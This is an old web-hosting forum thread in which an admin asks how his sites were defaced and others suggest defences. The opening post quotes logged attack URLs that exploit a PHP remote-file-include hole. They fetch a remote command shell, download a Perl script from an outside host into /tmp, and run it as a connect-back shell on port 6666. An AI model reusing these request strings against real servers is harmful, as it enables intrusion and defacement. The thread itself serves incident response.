The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

HACK!!:::(:( i don't understand how

Discussion in 'General Discussion' started by Creazioni, Mar 6, 2005.

  1. Creazioni

    Creazioni Well-Known Member

    Joined:
    Jan 5, 2003
    Messages:
    133
    Likes Received:
    0
    Trophy Points:
    16
    Hi
    last night hack my server
    my server is in this situation:

    1)
    /tmp
    /var/tmp
    partition mounted noexec

    2) .c .cc are disabled

    3) wget chmod 0

    4) php.ini
    disable_functions =shell_exec, system

    5) apache ServerSignature OFF

    6) pen_basedir OFF

    7) safe_mode OFF

    ===========how to hack all index??===========

    they open these links ( a simple site..no phpbb, no phpnuke, no forum)

    mainpage.php?sez=http://www.thecurse.pop.com.br/cmd.jpg?&cmd=id;uname%20-a"

    mainpage.php?sez=http://www.thecurse.pop.com.br/cmd.jpg?&cmd=lwp-download%20-a%20http://www.terror.as.ro/cb.txt%20/tmp/cb"

    mainpage.php?sez=http://www.thecurse.pop.com.br/cmd.jpg?&cmd=perl%20/tmp/cb%20loslagos.cc%206666

    mainpage.php?sez=http://www.thecurse.pop.com.br/cmd.jpg?&cmd=find%20/%20-perm%20777%20-type%20d%20%3E%20/tmp/777

    and change all index (i don't find how , but all index were hacked)

    I find these into ps -aux
    nobody 799 0.0 0.0 2100 968 ? S 10:21 0:00 sh -c find / -perm 777 -type d >
    /tmp/777 2>&1
    nobody 800 1.5 0.0 1472 516 ? D 10:21 0:00 find / -perm 777 -type d

    how possible stop nobody to change index and use find?
    =========================================

    i find into /var (not into /var/tmp) a dir named applogs/

    These !! xxxx...xxxx !!! change all index from web? from this site?
    how to to block this problem?

    Normaly hack with tmp and .c, but is hard find a solution about hack from web (cmd) ?
    APF-BFD- don't work for this problem, another solution??

    140.000 site in the world from 1/1/05 :(:(:(



    I hope find a solution
    I read a lot of thread, but no solution

    THANKS
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    From the information that you've given clearly this PHP script mainpage.php is poorly written and exploitable. You should remove it immediatey until it is fixed. You then need to check that your server has not suffered a root compromise. and then clean up the mess from the PHP script exploit.
     
  3. Creazioni

    Creazioni Well-Known Member

    Joined:
    Jan 5, 2003
    Messages:
    133
    Likes Received:
    0
    Trophy Points:
    16
    thanks
    but i hope find a solution (all have to find a solution, because hacker use these functions to enter and not tmp o var/tmp)

    Thanks
     
  4. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    You need two things:

    1. Clean up your server and remove all the tools left to attack your server;
    2. apply the latest security patches and fixes protecting your server from hackers and viruses;

    We can help!
     
  5. aolex

    aolex Member

    Joined:
    Oct 26, 2004
    Messages:
    20
    Likes Received:
    0
    Trophy Points:
    1
    contact me and i can help you to get the "hacker" . he is just a script kiddie , i know him ...
    you could scare the shit out of him and he will become a nice boy :eek:) ... cristi_nl2003 on
    messenger or www.aolex.net > contact ! ;)
     
  6. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Antagonising hackers is not a great idea :rolleyes:

    As Andy said above, if you cannot do the work yourself from the threads on the forum that explain how you can check your server, hire someone that can do it for you - I would suggest doing so by recommendation or reputation to be sure that you know you're going to get the service that you need.
     
  7. Creazioni

    Creazioni Well-Known Member

    Joined:
    Jan 5, 2003
    Messages:
    133
    Likes Received:
    0
    Trophy Points:
    16
    in 5 year is first time hack me (i've 15 servers)
    All day i find into tmp file to hack but system stop all..(hope)
    I've script delete every 1 minute everything whit chown nobody into tmp, var/tmp, dev/shm and other dir...all time bind-bd.pl-ronin-etcccc---stopped, firewall (hardware) stop al ddos, but i've this problem with index and i hope mod_security is a solution.
    I know how check server, i read 10 site and 150 thread about hack but none talk about
    this problem.
    In last 10 days, they hacked in same way subdomain.NASA and TWHATE

    thanks all
     
  8. StevenC

    StevenC Well-Known Member

    Joined:
    Jan 1, 2004
    Messages:
    254
    Likes Received:
    0
    Trophy Points:
    16
    I suggest hiring someone like chirpy to take a look :)
     
  9. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,448
    Likes Received:
    194
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
    I agree with this.
     
  10. sleuth1

    sleuth1 Well-Known Member

    Joined:
    Mar 16, 2003
    Messages:
    75
    Likes Received:
    0
    Trophy Points:
    6
    A couple of things that may help , and yes get the linux guy , to help out

    wget still runs from this exploit , no matter what you set it to ? tested this myself

    any php file without specified includes is vulnerable , before you delete the next one , go to the full URL specified and you will get a rude shock, a panel will open with full edit function , your /tmp directory is fully viewable, and these B.s will be laughing as you try and delete the files they shove in there , just cat and mouse to them. From tmp/ var tmp/ they can execute any commands they want some fail many work, they can see your host files, named files and many others, they can also move up in permissions , this is the scary thing . They can attack other servers, do brute force on other servers, it goes on and on, and of course when you p them off too much, they will deface all your index pages , just for fun and to make you sweat, you just cant allow them to do this, even one rougue file in /tmp , means you are in serious trouble and should immeadiatly track it down or pay some one to do it, now, it will cost you clients and a lot of money if you give them any slack

    Get the ips from grep domlogs, ban them in firewall , but they will be back , using different ips , the s Brazilian tribe are all on dialup (or at least seems that way) so there ips change all the time.

    of course it is .pl files that are the main problem, they will run from /tmp regardless, in an emergency , change /tmp var/tmp to 700 chmod, this will give you space to sort things out, horde , webmail and many scripts will fail , so just do it if urgent. also change /dev/shm in fstab , this is easy exploit.

    Any one know if a .htaccess file would work in /tmp /var/tmp since they are browser based attacks ?
     
    #10 sleuth1, Mar 6, 2005
    Last edited: Mar 6, 2005
  11. DigitalN

    DigitalN Well-Known Member

    Joined:
    Sep 23, 2004
    Messages:
    420
    Likes Received:
    1
    Trophy Points:
    18
    .htaccess in /tmp will work - You could just put one in / as well though, rather than /tmp - covering all bases.

    Mod security will go a long way to prevent remote php hacks - Make sure the Box (OS) is secure. Security starts with the OS and permissions - patching and blocking is ok, but to make things difficult and avoid some easy exploits, securing the underlying issues is the base for a secure system.
     
  12. Creazioni

    Creazioni Well-Known Member

    Joined:
    Jan 5, 2003
    Messages:
    133
    Likes Received:
    0
    Trophy Points:
    16
    in January i payed a society knew in this forum....they made give me a lot of problem.
    they installed all packages (apf, clam, etcc) without control the real problems of all server
    (update wrong kernel too :( )

    I have to find a GOOD SOCIETY and is not easy.
    I pay 2 tech in ITALY, pay another TECH is not problem....but i don't care a STANDARD WORK (install all pack listed into all forum)

    Sorry for my english


    mod_security give problem to apache or php scripts?
     
  13. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,448
    Likes Received:
    194
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
  14. jacks

    jacks Active Member

    Joined:
    Nov 15, 2004
    Messages:
    31
    Likes Received:
    0
    Trophy Points:
    6
    Recently my server was hacked so I contacted ServerTune to fix the problem. I have never been happier with the service and techinal ability of the employees at ServerTune. They did an excellent job, quickly and efficeintly. I highly recommend ServerTune to fix your sever problems!
     
Loading...

Share This Page